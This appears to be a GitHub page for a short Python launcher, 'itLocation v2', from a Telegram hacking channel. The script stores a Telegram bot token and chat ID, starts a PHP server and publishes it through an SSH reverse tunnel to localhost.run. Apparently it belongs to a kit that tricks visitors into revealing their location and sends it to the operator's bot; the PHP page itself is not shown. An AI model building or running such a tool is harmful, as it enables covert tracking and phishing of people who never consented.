-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathlocation.py
More file actions
32 lines (28 loc) · 834 Bytes
/
location.py
File metadata and controls
32 lines (28 loc) · 834 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#/usr/bin/env python3
# code by it4min
# itLocation v2
# t.me/LinuxArmy
import os
os.system("clear")
print(''' \033[92m
'&&&&&&&'
'&&&&&&&&&'
'&&&&&&&&&&&'
"&&&' '&&&"
"&&&&, ,&&&&" Code by it4min
"&&&&&&&&&&&&&" -----------------
"&&&&&&&&&&&" t.me/LinuxArmy
"&&&&&&&&&"
"&&&&&&&"
"&&&&&"
"&&&"
"&" \033[95m
#####################################
''')
open('bot-data.txt', 'w').close()
token = input("Enter the robot token: ")
chat_id = input("Enter your chat ID: ")
f = open("bot-data.txt", "a")
f.write(token+"$"+chat_id)
f.close()
os.system("php -S localhost:8080 | ssh -R 80:localhost:8080 ssh.localhost.run")